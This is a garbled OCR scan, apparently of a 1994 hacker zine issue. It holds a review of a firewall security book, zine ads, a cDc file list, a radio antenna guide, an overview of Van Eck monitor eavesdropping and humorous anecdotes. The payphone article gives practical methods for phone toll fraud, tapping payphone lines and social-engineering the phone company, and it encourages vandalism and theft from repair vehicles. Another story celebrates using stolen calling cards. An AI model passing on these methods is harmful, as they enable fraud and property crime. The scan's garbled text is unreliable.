PEM, PGP and RIPEM) are clear (as clear as cryptography can get) and the 
omputer crime sections are also good -- although I’m not a lawyer and 
therefore cannot really comment on it, and notes that look like "5 USC 
552a(b) (c) (10)" cause me to shudder. It’s interesting to note that some 
administrative functions as presented in this book, what the authors call 
counter-intelligence (reverse fingers and rusers) and booby traps and fake 
password file are open for ethical debate. Perhaps they are not illegal, 
but counter-intelligence can surely ring the warning bells on the site being 
counter-fingered if that site itself is security aware. 


That said, let’s move to hackers. I refer to these as "hacker studies", 
or whatever, for lack of a better name. This is Part III (A Look 

Back), which contains the methods of attacks (social engineering, 
stealing passwords, etc), the Berferd incident (more on that later), 

and an analysis (statistical and otherwise) of the Bell Labs gateway 
logs. 


Back to where we started, there is nothing new or innovative about 
these chapters. The Berferd hacker case is not new, it is mostly just 
uninteresting. The chapter is mostly a copy (they do state this) of 
Bill Cheswick’s paper titled "A Night with Berferd, in Which a Cracker 
is Lured, Endured and Studied." The chapter concerning probes and 
door-knob twisting on the Internet (Traps, Lures, and Honey Pots) 

is mostly a copy (they do not state this) of Steven Bellovin’s paper 
titled, "There Be Dragons". What do we learn from the hacker-related 
chapters? Let’s take Berferd: The Sendmail DEBUG hole expert. After 
mailing himself a password file and receiving it with a space after 

the username, he tries to add accounts in a similar fashion. Cheswick 


calls him "flexible". I might have chosen another F-word. Next are 
the hacker logs. People finger. People tftp /etc/passwd. People try 
to rlogin as bin. There are no advanced attacks in these sections. 


Compared with the scary picture painted in the Firewalls chapter -- 
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that of the Bad Guy spoofing hostnames, flooding DNS caches, faking 
NFS packets and much more -- something must have gone wrong. (**) 


Still, I cannot say that this information is totally useless. It is, 
as mentioned, old. It is available and was available since 1992 
on ftp://research.att.com:{/dist/internet_security,/dist/smb}. (***) 


The bottom line is that this book is, in my opinion, foremost and upmost 

a Firewaller’s book. The hacker section could have been condensed 

into Appendix D, a copy of the CERT advisory about computer attacks 
("Don’t use guest/guest. Don’t leave root unpassworded.") It really 
takes ignorance to believe that inexperienced hackers can learn "hacker 
techniques" and become mean Internet break-in machines just by reading 
_Firewalls and Internet Security_. Yes, even the chapter dedicated 

to trying to attack your own machine to test your security (The Hacker’s 
Workbench) is largely theoretical. That is to say, it doesn’t go above 
comments like "attack NFS". The probes and source code supplied there are 
for programs like IP subnet scanners and so on, and not for "high-level" 
stuff like ICMP bombers or similar software; only the attacks are 
mentioned, not to implementation. This is, by the way, quite 
understandable and expected, but don’t buy this book if you think it 
will make you into some TCP/IP attacker wiz. 


In summary: 


THE GOOD 

The Firewalls part is excellent. The other parts not related to 
hacker-tracking are good as well. The added bonuses -- in the form 
of a useful index, a full bibliography (with pointers to FTP sites), 


a TCP port list with interesting comments and a great (running out 
of positive descriptions here) online resources list -- are also 
grand (whew). 


HE BAD 


[The hacker studies sections, based on old (circa 1992) papers, are 

not interesting for anyone with any knowledge of hacking and/or 

security who had some sort of encounters with hackers. People without 
this knowledge might either get the idea that: (a) all hackers are 

stupid and (b) all hackers are Berferd-style system formatters. Based on 
the fact that the authors do not make a clear-cut statement about 

hiring or not hiring hackers, they just say that you should think 

if you trust them, and that they generally appear not to have a total 
draconian attitude towards hackers in general, I don’t think this was 
intentional. 


THE UGLY (For the nitpickers) 


[There are some nasty little bugs in the book. They’re not errors 

n that sense of the word; they’re just kind of annoying -- if you’re 
sensitive about things like being called a hacker or a cracker, they’1l 
annoy you. Try this: although they explain why they would use the term 
"hacker" when referring to hackers (and not "eggsucker", or "cracker"), 
they often use terms like "Those With Evil Intention". Or, comparing 
_2600 Magazine_ to the Computer underground Digest. 


B- 


(*) From the Firewalls FAQ <fwalls-faq@tis.com>: 
‘“‘A firewall is any one of several ways of protecting one 
network from another untrusted network. The actual mechanism 
whereby this is accomplished varies widely, but in 
principle, the firewall can be thought of as a pair of 
mechanisms: one which exists to block traffic, and the other 
which exists to permit traffic. Some firewalls place a 
greater emphasis on blocking traffic, while others emphasize 
permitting traffic.’’ 


(**) This would be a great place to start a long and boring discussion 
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about different types of hackers and how security (including firewalls) 
affect them. But... I don’t think so. 


(***) ftp://research.att.com:/dist/internet_security/firewall.book also 
contains, in text and PostScript, the list of parts, chapters and 
sections in the book, and the Preface section. For that reason, 
those sections weren’t printed here. 

All the papers mentioned in this review can be found on that FTP 
site. 


Announcing Bellcore’s Electronic Information Catalog for Industry 
Clients... 


To access the online catalog: 


telnet info.bellcore.com 
login: cat10 


or dial 201-829-2005 
annex: telnet info 
login: cat10 


[Order up some E911 Documents Online! ] 


TTTTT H H EEEEE 
c H HE 
a HHHHH BEEEE 
ue H HE 
T H H EEEFEE 
cece U U RRRR M MU U DDDD GGG EEEEE OOO N N 
Cc CU UR R MM MM U UD DG GE O O NN N 
Cc U U RRRR MMMU UD DG KEEEE O ONNN 
€ CU UR R M MU UD DG GGE ) ON NN 
CCC UUU R RM M UUU DDDD GGG EEEEE OOO N N 
Bill Clinton promised good health care coverage for everyon 
Bill Clinton promised jobs programs for the unemployed. 


Bill Clinton promised that everyone who wanted could serve in the military. 
Bill Clinton promised a lot. So does the Curmudgeon. 
But unlike Bill Clinton, we’ll deliver... 


For only $10 a year (12 issues) you’ll get alternative music reviews and 
interviews, political reporting, anti-establishment features and 
commentary, short fiction, movie reviews, book reviews, and humor. Learn 
the truth about the Gulf War, Clipper, and the Selective Service System. 
Read everything you wanted to know about bands like the Offspring, R.E.M., 
the Cure, Porno for Pyros, Pearl Jam, Dead Can Dance, Rhino Humpers, and 
Nine Inch Nails. Become indoctrinated by commentary that just might change 
the way you think about some things. Subscribe to the Curmudgeon on paper for 
$10 or electronically for free. Electronic subscribers don’t get 
everything that paying subscribers do like photos, spoof ads, and some 
articles. 


Paper: send $10 check or money order to the Curmudgeon 
4505 University Way N.E. 
Box 555 
Seattle, Washington 
98105 
Electronic: send a request to rodneyl@u.washington.edu 


oO 
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—Underground —- Editorials Reviews News Other Really Cool Stuff- 


Published Quarterly/Semi-Quarterly By Fennec Information Systems 
This is one of the more popular new electronic publications. To 
get your free subscription, please s the addresses below. 

Don’t miss out on this newsworthy publication. We are getting 
hundreds of new subscriptions a month. This quarterly was promoted 
in Phrack Magazine. If you don’t subscribe, you’re only cheating 


yourself. Have a great day...and a similar tomorrow 


* Coming soon * A Windows-based help file containing all of the issues 
of the magazine as well as extensive bio’s of all of the 


editors. 
Subscription Requests: sub@fennec.com 
Comments to Editors : editors@fennec.com 
Back issues via Ftp : etext.archive.umich.edu /pub/Zines/JAUC 
fc.net /pub/tjoauc 
Submissions >: submit@fennec.com 
Finger info >: dfox@fc.net and kahuna@fc.net 


Make the best out of your European pay telephone 
by Onkel Dittmeyer, onkeld@ponton.hanse.de 


Okay guys and girls, let’s come to a topic old like the creation 
but yet never revealed. European, or, to be more exact, German pay 
phone technology. Huh-huh. 


There are several models, round ones, rectangular ones, spiffy 
looking ones, dull looking ones, and they all have one thing in 
common: If they are something, they are not what the American reader 
might think of a public pay telephone, unlike it’s U.S. brothers, 
the German payphones always operate off a regular customer-style 
telephone line, and therefore they’re basically all COCOTS, which 
makes it a lot easier to screw around with them. 


Let’s get on with the models here. You are dealing with two 
classes; coin-op ones and card-op ones. All of them are made by 
Siemens and TELEKOM. The coin-op ones are currently in the process 
of becoming extinct while being replaced by the new card-op’s, and rather 
dull. Lacking all comfort, they just have a regular 3x4 keypad, 
and they emit a cuckoo tone if you receive a call. The only way to 
tamper with these is pure physical violence, which is still easier 
than in the U.S.; these babies are no fortresses at all. Well, while 
the coin-op models just offer you the opportunity of ripping off 
their money by physically forcing them open, there is a lot more 
fun involved if you’re dealing with the card babies. They are really 
spiffy looking, and I mean extraordinary spiffy. Still nothing 
compared to the AT&T VideoFoNeZ, but still really spiffy. The 2-line 
pixel-oriented LCD readout displays the pure K-Radness of it’s 
inventors. Therefore it is equipped with a 4x4 keypad that has a lot 
of (undocumented) features like switching the mother into touch-tone 
mode, redial, display block etc. Plus, you can toggle the readout 
between German, English, and French. There are rumors that you can 
put it into Mandarin as well, but that has not been confirmed yet. 


Let’s get ahead. Since all payphones are operating on a regular 
line, you can call them up. Most of them have a sign reading their 
number, some don’t. For those who don’t, there is no way for you to 
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figure out their number, since they did not invent ANI yet over here 
in the country famous for its good beer and yodel chants. Well, try 
it. I know you thought about it. Call it collect. Dialing 010 will 
drop you to a long-distance operator, just in case you didn’t know. 
He will connect the call, since there is no database with all the 
payphone numbers, the payphone will ring, you pick up, the operator 
will hear the cuckoo tone, and tell you to fuck off. Bad luck, eh? 


This would not be Phrack if there would be no way to screw it. 

If you examine the hook switch on it closely, you will figure out 
that, if you press it down real slow and carefully, there are two 
levels at whom it provokes a function; the first will make the phone 


hang up the line, the second one to reset itself. Let me make this 
a little clearer in your mind. 


Raa <--- totally released 

| 

| 

| <--- hang up line 
press to this level --> | 

| Gi==) PESek 

| 

a <--- totally hung up 


Involves a little practice, though. Just try it. Dial a number 
it will let you dial, like 0130, then it will just sit there and 
wait for you to dial the rest of the number. Start pressing down 


the hookswitch really slow till the line clicks away into suspense, 
if you release it again it will return you to the dial tone and 
you are now able to call numbers you aren’t supposed to call, like 


010 (if you don’t have a card, don’t have one, that’s not graceful), 
or 001-212-456-1111. Problem is, the moment the other party picks 
up, the phone will receive a charge subtraction tone, which is a 
16kHz buzz that will tell the payphone to rip the first charge unit, 
30 pfennigs, off your card, and if you don’t have one inserted and 
the phone fails to collect it, it will go on and reset itself 
disconnecting the line. Bad luck. Still good enough to harass your 
favorite fellas for free, but not exactly what we’re looking for, 
right? Try this one. Push the hook lever to the suspension point, 
and let it sit there for a while, you will have to release it a 

bit every 5 seconds or so, or the phone will reset anyway. If you 
receive a call while doing this, a buzz will appear on the line. 


Upon that buzz, let the lever go and you’ll be connected, and 
the cuckoo tone will be shut up! So if you want to receive a collect 
call, this is how you do it. Tell the operator you accept the charges, 
and talk away. You can use this method overseas, too: Just tell your 
buddy in the states to call Germany Direct (800-292-0049) and make 
a collect call to you waiting in the payphone, and you save a cool 
$1.17 a minute doing that. So much for the kids that just want to 
have some cheap fun, and on with the rest. 


Wasting so much time in that rotten payphone, you probably 
noticed the little black box beneath the phone. During my, erm, 
research I found out that this box contains some fuses, a standard 
Euro 220V power connector, and a TAE-F standard phone connector. 
Completing the fun is the fact that it’s extremely easy to pry it 
open. The TAE-F plug is also bypassing the phone and the charge 
collection circuits, so you can just use it like your jack at home. 
Bring a crowbar and your laptop, or your Pentium tower, power it over 
the payphone and plug your Dual into the jack. This way you can even 
run a board from a payphone, and people can download the latest 
WaReZzzZzz right from the booth. It’s preferable to obtain a key for 
the lock of the box, just do some malicious damage to it (yes, let 
the animal take control), and call Telekom Repairs at 1171 and they 
will come and fix it. Since they always leave their cars unlocked, 
or at least for the ones I ran across, you can either take the whol 
car or all their k-rad equipment, manuals, keys, and even their lunch 
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box. But we’re shooting off topic here. The keys are usually general 
keys, means they fit on all payphones in your area. There should also 
be a nationwide master key, but the German Minister of Tele- 
communications is probably keeping that one in his desk drawer. 


The chargecards for the card-op ones appear to have a little chip 
on them, where each charge unit is being deducted, and since no-one 
could figure out how it works, or how to refill the cards or make a 
fake one, but a lot of German phreaks are busy trying to figure that 
out. 


A good approach is also social-engineering Telekom so they turn 
off the charge deduction signal (which doesn’t mean the call are free, 
but the buzz is just not transmitted any more) so the phone doesn’t 
receive a signal to charge you any money no matter where you call. 
The problem with this method is that the world will spread in the 
neighborhood that there is a payphone where you can call for free, 
and therefore it will be so crowded that you can’t use it, and 
the phone pals will catch up fast. It’s fun though, I tried it, and 
I still get free drinks at the local pub for doing it. 


Another k-rad feature on them is the built-in modem that they use 
to get their software. On a fatal error condition they appear to dial 
a telecom number and download the latest software just how their ROM 
commands them to do. We will shortly take a phone, install it some- 
where else and figure out where it calls, what the protocol is and 
what else is being transmitted, but that will probably be in another 
Phrack. 


If you found out anything that might be of interest, you are 
welcome to mail it to onkeld@ponton.hanse.de using the public key 
beneath. Unencrypted mail will be killed since ponton.hanse.de is 
run by a paranoid bitch that reads all traffic just for the hell 
of it, and I don’t want the phedzZz to come and beat me over th 
head with a frozen chunk o’ meat or worse. 


Stay alert, watch out and have fun... 


== BEGIN PGP PUBLIC KEY BLOCK-—----— 
Version: 2.3a 


x 


mQCNAi ze 9DEAAAEEAKOb 5ebKYg 6cAxaiVT /H5UhCqgNNDHpkBwFMNuQW2nGnLMvg 
QOwolxrM51ltnnuCBJGrGNskt 3IMXsav6+YF jG6IA8YRHgVvWEwYrTeW2tniS7/dxyY 
f£qCCSzTxJ9Tt LAiMDBgJFz01U43025zp7rVvKThgqRghLx4cRDVBISel/bMSZAAUR 
tChPbmt lbCBEaXRODWV5ZXIgPG9ua2VsSZEBwh250b2 4uaGFuc2UuZGU+ 

=b5ar 
Sear alec, END PGP PUBLIC KEY BLOCK----- 


((___) ) INFORMATION IS JUNK MAIL ((___) ) 
[ x x ] [ x x ] 
\ / cDc communications \ / 
(’ 7) -cDc- CULT OF THE DEAD COW -cDc- Gh 7) 
(U) (U) 
deal with it, presents unto you 10 phat t-files, deal with it, 
SUCKER fresh for July 1994: SUCKE 
New gNu NEW gnU new GnU nEW gNu neW gnu nEw GNU releases for July, 1994: 


/Text Files\ 


261: “Interview with Greta Shred" by Reid Fleming. Reid conducts an in-depth 
interview with the editor of the popular ’zine, _Mudflap_. 


262: "_Beverly Hills 90210_ as Nostalgia Television" by Crystal Kile. Paper 
presented for the 1993 National Popular Culture Association meeting in New 
Orleans. 
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263: "What Color Is the Sky in Your World?" by Tequila Willy. Here’s your 
homework, done right for you by T. “"Super-Brain" Willy. 


264: "Chicken Hawk" by Mark E. Dassad. Oh boy. Here’s a new watermark low 
level of depravity and sickness. If you don’t know what a "chicken hawk" is 
already, read the story and then you’1l understand. 


265: “Eye-rON-EE" by Swamp Ratte’. This one’s interesting ’cause only about 
half-a-dozen or so lines in it are original. The rest was entirely stuck 
together from misc. files on my hard drive at the time. Some art guy could say 
it’s a buncha post-thiséthat, eh? Yep. 


266: "Interview with Barbie" by Clench. Barbie’s got her guard up. Clench 
goes after her with his rope-a-dope interview style. Rope-a-dope, rope-a-dop 
This is a boxing reference to a technique mastered by The Greatest of All Time, 
Muhamed Ali. 


267: “About a Boy" by Franken Gibe. Mr. Gibe ponders a stolen photograph. 
Tiny bunnies run about, unhindered, to find their own fate. 


268: "Mall Death" by Snarfblat. Story about a Dumb Girl[TM]. Are you 
surprised? 


269: "Prophile: Future History" by THE NIGHTSTALKER. It’s the future, things 
are different, but the Master Hacker Dude lives on. 


270: "Time out for Pop" by Malcolm D. Moore. Sad account of a hopless-pop. 


/cDc Gnuz\ 


"And that no man might buy or sell, save he that had the mark, or the name 
of the Cow, or the number of his name. Here is wisdom. Let him that hath 
understanding count the number of the Cow: for it is the number of a man; and 
his number is eight billion threescore and seven million nine hundred fourty- 
four thousand three hundred threescore and two. So it is written." -Omega 


Yowsah, yowsah, yowsah. JULY once again, the super-hooray month which marks 
cDc’s 8th year of existence. Outlasting everyone to completely rule and 
dominate all of cyberspace, blah blah blah. Yeah, think a special thought 
about cDc’s significance in YOUR life the next time you go potty. Name your 
firstborn child after me, and we’1ll call it karmicly even, pal. My name is 
Leroy. 


We’re always taking t-file submissions, so if you’ve got a file and want to 
really get it out there, there’s no better way than with cDc. Upload text to 
The Polka AE, to sratte@phantom.com, or send disks or hardcopy to the cDc post 
office box in Lubbock, TX. No song lyrics and bad poetry please; we’1ll leav 
that to the no-class-havin’, bottom-feeder shoveling orgs. out there. 


News item of the month, as found by Count Zero: 


"ROTTING PIG FOUND IN DITCH 


VERDEN, OKLAHOMA — Responding to a tip from an employee, Verden farmer Bill 
McVey found a rotting pig in a ditch two miles north of town. Farmer McVey 
reported the pig to the authorities, because you cannot, legally, just leave a 
dead pig in a ditch. You must dispose of your deceased livestock properly. 
There are companies that will take care of this for you. As for proper 
disposal of large dead animals, McVey contracts with Used Cow Dealer." 


"...and the rivers ran red with the bl100d 
of the Damned and the Deleted..." 
—Dem0nSeed 
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S. Ratte’ 
cDc/Editor and P|-|Earl3zz |_3@DeRrr 


"We’re into t-files for the groupies and money." 
Middle finger for all. 

Write to: P.O. Box 53011, TX 79453. 
Internet: 


ALL cDc FIL 


cDc communications, Lubbock, 
sratte@phantom.com. 


ES LEECHABLE FROM FTP.EFF.ORG IN pub/Publications/CuD/CDC. 
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[ Radio Modification Project ] 


Tuning in to Lower Frequency Signals June 26, 1994 


[ By: Grendel / 905 ]===> 


Th 


lower frequency regions of the radio spectrum are often 
and DX’ers alike due to the 


ignored by ham’ers, 


pirates, 


relatively little known ways of tuning in. 


The following article 


will detail how to construct a simple-made antenna to tune in 
to the LF’s and show how to adjust an amateur band type radio 
to receive the desired signals. 


/ 
\/ 
\ 


\ 

a 

\ /hne lower frequency spectrum has been made to include 
t 

s 


vies 


he very low frequency ("VLF" 2 kHz to 30 kHz) band anda 
mall part of the medium frequency ("MF" 300 500 kHz) band. 
For our purposes, a suitable receiver must be able to cover 
he 2 kHz to 500 kHz range as well as being calibrated at 10 
Hz intervals (standard). The receiver must also be capable of 
overing AM and CW broadcasts. For best capabilities, the 
eceiver should also be able to cover LSB ("lower side band") 
nd USB ("upper side band"). 


9K AWC 


The Receiving System 


RPO REM EO VE ONE NE ORE NE UNE NE 


The receiver I use consists of a standard amateur HF ("High 


Frequency") band receiver adjusted between the 3,500 and 4,000 
kHz bands. This causes th receiver to act as a tuneable IF 
("Intermediate Frequency") and also as demodulator. You will 
also require a wideband LF ("Low Frequency") converter which 
includes a 3,500 kHz crystal oscillator. See Fig. 1: 
==[ Fig 1. Block Diagram ] 
\ANT / 
\./ crystal 
| | 
MSSSe | 2 -— 500 kHz | | 3-4000 kHz | 
| Converter* | i" | IF Receiver |---OUTPUT 
.SaS = | | | | 
| 
GND 


*The converter is a circuit board type 80D/L-101/PCB 

available from L.F. Engineering Co, 17 Jeffry Road, 
East Haven CT, 06513 for $43 US including S & H.One 
may be constructed to work with your receiver (but 
at a higher price no doubt). 
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Phono jack plugs and sockets are used for the interconnections 
throughout the receiving system and the converter and 
receiver (7) are connected with RG58 coax cable of no greater 
length than 4 ft. 

When tuning, the station frequency is measured by deducting 
3,500 kHz from the scale on the main receiver (ie. 340 kHz = 
3,840 kHz on the main receiver, 120 = 3,620 kHz, 95 = 3,595 
kHz, etc.) 


The Ferrite End-fed Antenna 
RENE NE ONE AE AL ALT SEO AL AE NEF AE % 

This is a small antenna designed to tune between 95 kHz and 
500 kHz. It consists of a coil wound around a ferrite rod, with 
a 4 ft. lead. 


Materials: 
o 67 7/8" x 3/8" ferrite rod 
5" 24 SWG double cotton covered copper wire 
2 PLASTIC coated terry clips 
a wood or plastic base (8 1/2" x .8" x .5") 
2 standard, two-gang 500 pF tuning capacitors 
a plastic plate (preferably 2" high) 


00000 


-- A Few Things on Van Eck’s Method of Eavesdroping -- 
Opticon the Disassembled —- UPi 


Dr Wim Van Eck, was the one who developed the anonymous method for 
eavesdroping computers ( and, apparently, not only ) from distance, 
in the laboratories of Neher, Holland. This method is based on the 
fact that monitors do transmit electromagnetic radiations. As a device, 
it is not too complex and it can be constructed from an experienced 
electronics phreak. It uses a simple-direction antenna which grabs 
monitor signals from about 800 meters away. Simplified schematics are 
available from Consumertronics. 


TEMPEST stands for Transient ElectroMagnetic Pulse Emanation STandard. 
It concerns the quantity of electromagnetic radiations from monitors and 
televisions, although they can also be detected on keyboards, wires, 
printers and central units. There are som security levels in which such 
radiations are supposed to be untraceable by Van Eck systems. Those 
security levels or standards, are described thoroughly in a technical 
exposition called NACSIM 5100A, which has been characterized by NSA 
classified. 


Variations of the voltage of the electrical current, cause electromagnetic 
pulses in the form of radio waves. In cathode ray tube (C.R.T. ) devices, 
such as televisions and monitors, a source of electrons scans the internal 
surface and activates phosphore. Whether or not the scanning is interlaced or 
non-interlaced, most monitors transmit frequencies varying from 50 to 75 
Mhz per second. They also transmit harmonic frequencies, multiplies of the 
basic frequencies; for example a transmitter with signal of 10 Mhz per second 
will also transmit waves of 20, 30, 40 etc. Mhz. Those signals are 
weaker because th transmiter itself ffaces them. Such variations in the 
voltage is what the Van Eck system receives and analyzes. 


There are ways to prevent or make it harder for someone to monitor 
your monitor. Obviously you cannot place your computer system 
underground and cover it with a Faraday cage or a copper shield 
( If your case is already that, then you know more about Van Eck 
than I do ). What else ? 


(1) Certain computers, such as Wang’s, prevent such divulges; 
give preference to them. 


(2) Place your monitor into a grounded metal box, 1.5 cm thick. 
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(3) Trace your tracer(s). They gonna panic. 


(4) Increase of the brightness and lowering of the contrast 
reduces TEMPEST’s power. Metal objects, like bookshelves, 
around the room, will also help a little bit. 


(5) Make sure that two or more monitors are transmitting at the same 
frequency and let them operate simultaneously; this will confuse 
Van Eck systems. 


(6) Buy or make on your own, a device which will transmit noise 
at your monitor’s frequency. 


(7) Act naturally. That is: 


(a) Call IRC, join #hack and never mumble a single word. 
(b) Read only best selling books. 


(c) Watch television at least 8 hours a day. 


(d) Forget altruism; there is only you, yourself 
and your dick/crack. 


(8) Turn the monitor off. 


-Almost Busted- 
By: Deathstar 


It all started one week in the last month of summer. Only my brother 
and I were at the house for the whole week, so I did whatever I wanted. 
Every night, I would phreak all night long. I would be either at a payphone 
using AT&Tz, or at home sitting on a conference. I would be on the phone 
till at least four or five in the morning. But one night, my luck was running 
thin, and I almost phreaked for the last time. I was at a payphone, using 
cards. I had been there since around twelve midnight.. The payphone was 
in a shopping center with a supermarket and a few other stores. Most every 
thing closed at eleven.. Except for the nearby gas station. Anyway, I was 
on the phone with only one person that night. I knew the card would be dead 
by the end of the night so I went ahead and called him on both of his lines 
with both of the payphones in the complex with the same card. I had talked 
for hours. It started to get misty and hard to see. Then, I noticed a car 
of some kind pulling into the parking lot. I couldn’t tell what kind of 
car it was, because it was so dark. The car started pulling up to me, and 
hen it was around twenty feet away I realized it was a police car. They 
ot on the loudspeaker and yelled "Stay where you are!". I dropped the 
hone and ran like hell past the supermarket to the edge of the complex. 
went down a bike path into a neighborhood of townhouses. Running across 
he grass, I slipped and fell about two or three times. I knew they were 
ollowing me, so I had to hide. I ran to the area around the back of 
he supermarket into a forest. I smacked right into a fence and fell 
on the ground. I did not s the fence since it was so dark. Crawling a 
few feet, I laid down and tried to cover my body with some leaves and 
dirt to hide. I was wearing an orange shirt and white shorts. I laid 
as still as I could, covered in dirt and leaves. I could hear the police 
nearby. They had flashlights and were walking through the forest looking 
for me. I knew I would get busted. I tried as hard as I could to keep 
from shaking in fear. I lay there for around thirty minutes. Bugs were 
crawling around on my legs biting me. I was itching all over. I couldn’t 
give up though, because if they caught me I knew that would be the end 
of my phreaking career. I was trying to check if they were still looking 
for me, because I could not hear them. Just as I was about to make a run 
for it, thinking they were gone I heard a police radio. I sat tight again. 
For another hour, I lay there until finally I was sure they were gone. I 
got up and started to run. I made my way through the neighborhood to my 


tihtHdaQ = 
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house. Finally I got home. It was around five thirty a.m. I was filthy. 
The first thing I did was call the person I was talking to on the payphone 
and tell him what happened. Then, I changed clothes and cleaned myself up. 
I checked my vmb to find that a conference was up. I called it, and told 
my story to everyone on. 


I thought that was the end of my confrontation with the police, but I 
was wrong. The next day I had some people over at my house. Two or Three 
good friends. One of them said that there was a fugitive loose in our 
town. We were bored so we went out in the neighborhood to walk around 
and waste time. Hardly anyone was outside, and police cars were going 
around everywhere. One guy did leave his house but he brought a baseball 
bat with him. We thought it was funny. Anyway, we soon got bored and 
went back home. Watching tv, we turned to the news. They had a Report 
about the Fugitive. We watched. It showed a picture of the shopping 
center I was at. They said "One suspect was spotted at this shopping 
center last night at around four thirty in the morning. The officer 
is around ninety five percent sure that the suspect was the fugitive. 

He was wearing a orange shirt and white shorts, and ran when approached." 
I then freaked out. They were searching my neighborhood for a fugitive 
that didn’t exist! I called back the guy I was talking to the night 
before and told him, and then told everyone that was on the conference 
the night before. It ended up that the fugitives never even entered 


our state. They were caught a week later around thirty miles from 
the prison they escaped from. Now I am known by two nicknames. "NatureBoy" 
becaus veryone says I communed with nature for a hour and a half hiding 


from the police, and "The Fugitive" for obvious reasons. Anywayz, That’s 
how I was almost busted.. 


-DS 
The following is a *true* story. It amused the hell out of me while it 
was happening. I hope it isn’t one of those "had to be there" things. 


Copyright 1994 Captain Sarcastic, all rights reserved. 


On my way home from the second job I’ve taken for the extra holiday caSh I 
need, I stopped at Taco Bell for a quick bite to eat. In my billfold is 

a $50 bill and a $2 bill. That is all of the cash I have on my person. 

I figure that with a $2 bill, I can get something to eat and not have to 
worry about people getting pissed at me. 


ME: "Hi, I’d like one seven layer burrito please, to go." 
DL "Is that it?" 

ME: "Yep." 

IT: "That’ll be $1.04, eat here?" 

ME: "No, it’s *to* *go*." [I hate effort duplication.] 


At his point I open my billfold and hand him the $2 bill. He looks at it 
kind of funny and 


iT: "Uh, hang on a sec, I’1l be right back." 


He goes to talk to his manager, who is still within earshot. The 
following conversation occurs between the two of them. 


IT: "Hey, you ever see a $2 bill?" 

MG: "No. A what?" 

IT: "A $2 bill. This guy just gave it to me." 

M "Ask for something else, THERE’S NO SUCH THING AS A $2 BILL." [my emp] 
IT "Yeah, thought so." 


He comes back to me and says 


IT: "We don’t take these. Do you have anything else?" 
ME: “Just this fifty. You don’t take $2 bills? Why?" 
Ip; “Eden. :know." 
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ME: "S here where it says legal tender?" 
IT "Yeah." 

ME: "So, shouldn’t you take it?" 

IT: "Well, hang on a sec." 


He goes back to 


his manager who is watching me like I’m going to 


shoplift, and 

IT "He says I have to take it." 

MG: "Doesn’t he have anything else?" 

IT: "Yeah, a fifty. I’11 get it and you can open the safe and get change." 
MG: "T’M NOT OPENING THE SAFE WITH HIM IN HERE." [my emp] 

IT: "What should I do?" 


RI 


EAL money." 


MG: "Tell him to come back later when he has 

el ee "I can’t tell him that, you tell him." 

MG: "Just tell him." 

IT "No way, this is weird, I’m going in back." 


The manager approaches me and says 


MG: "Sorry, we don’t take big bills this time of night." [it was 8pm and 
this particular Taco Bell is in a well lighted indoor mall with 100 
other stores. ] 

ME: "Well, here’s a two." 

MG: "We don’t take *those* either." 

ME: "Why the hell not?" 

MG: "I think you *know* why." 

ME: "No really, tell me, why?" 

MG: "Please leave before I call mall security." 

ME: "Excuse me?" 

MG: "Pleas ave before I call mall security." 

ME: "What the hell for?" 

MG: "Please, sir." 

ME: "Uh, go ahead, call them." 

MG: "Would you please just leave?" 

ME: "NOg." 

MG: "Fine, have it your way then." 

ME: "No, that’s Burger King, isn’t it?" 

At this point he BACKS away from me and calls mall security on the phone 


around the corner. 
and I begin laughing out loud, just for 
45 year oldish guy comes in and says [at 
whisper] 


SG: "Yeah, Mike, what’s up?" 

MG: "This guy is trying to give me some 

SG: "Really? What?" 

MG: "Get this, a *two* dollar bill." 

SG: "Why would a guy fake a $2 bill?" 

MG: "I don’t know? He’s kinda weird. 
ayrElecy" 

SG: "So, the fifty’s fake?" 

MG: "NO, the $2 is." 

SG: "Why would he fake a $2 bill?" 

MG: "I don’t know. Can you talk to him, 

SG: "Yeah..." 


Security guard walks over to me and says 


I have two people STARING at me from the dining area, 


effect. A few minutes later this 
the other end of counter, ina 


[pause] funny money." 


[incredulous] 


Says the only other thing he has is 


and get him out of here?" 


SG: "Mike here tells me you have some fake bills you’re trying to use." 
ME: "Uh; no.” 

SG: "Lemme see ’em." 

ME: "Why?" 

SG: "Do you want me to get the cops in here?" 

At this point I was ready to say, "SURE, PLEASE," but I wanted to eat, so 


I said 
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"T’m just trying to buy a burrito and pay for it with this $2 bill." 


I put the bill up near his face, and he flinches like I was taking a 
swing at him. He takes the bill, turns it over a few times in his hands, 
and says 


SG: "Mike, what’s wrong with this bill?" 

MG: "Tt’s fake." 

SG: "Tt doesn’t look fake to me." 

MG: "But it’s a **S2** bill." 

SG: "Yeah?" 

MG: "Well, there’s no such thing, is there?" 


The security guard and I both looked at him like he was an idiot, and it 
dawned on the guy that he had no clue. 


My burrito was free and he threw in a small drink and those cinnamon 
things, too. Makes me want to get a whole stack of $2 bills just to see 
what happens when I try to buy stuff. If I got the right group of 
people, I could probably end up in jail. At least you get free food. 
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The official Legion of Doom t-shirts are still available. 

Join the net.luminaries world-wide in owning one of 

these amazing shirts. Impress members of the opposite sex, increase 
your IQ, annoy system administrators, get raided by the government and 
lose your wardrobe! 


Can a t-shirt really do all this? Of course it can! 


"THE HACKER WAR -- LOD vs MOD" 


This t-shirt chronicles the infamous "Hacker War" between rival 
groups The Legion of Doom and The Masters of Destruction. The front 
of the shirt displays a flight map of the various battle-sites 

hit by MOD and tracked by LOD. The back of the shirt 

has a detailed timeline of the key dates in the conflict, and 

a rather ironic quote from an MOD member. 


(For a limited time, the original is back!) 


"LEGION OF DOOM -- INTERNET WORLD TOUR" 

The front of this classic shirt displays "Legion of Doom Internet World 
Tour" as well as a sword and telephone intersecting the planet 

earth, skull-and-crossbones style. The back displays the 

words "Hacking for Jesus" as well as a substantial list of "tour-stops" 


(internet sites) and a quote from Aleister Crowley. 


All t-shirts are sized XL, and are 100% cotton. 


Cost is $15.00 (US) per shirt. International orders add $5.00 per shirt 
postage. 


Send checks or money orders. Please, no credit cards, even if 
it’s really your card. 


Name: 


Address: 


City, State, Zip: 


I want "Hacker War" shirt(s) 


I want "Internet World Tour" shirt (s) 


for 


4.txt 


Enclosed is $ 


Mail to: 
603 W. 
Austin, 


These T-shirts are sold only as a novelty items, 
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for the total cost. 


Chris Goggans 
13th #1A-278 
TX 78701 


attempting to glorify computer crime. 


and are in no way 


introducing... 


The PHRACK Horoscope, 


Summer 1994 


Foreseen in long nights of nocturnal lubrication by Onkel Dittmeyer 


Do you believe in the stars? Many do, 
can tell you a whole lot about the future. 
you in hell. 
horoscope for all eleet hackerz for the summer of 1994. 


believe it? Good. B 


doomed. S 


some don’t. In 


Her 


fact, the stars 


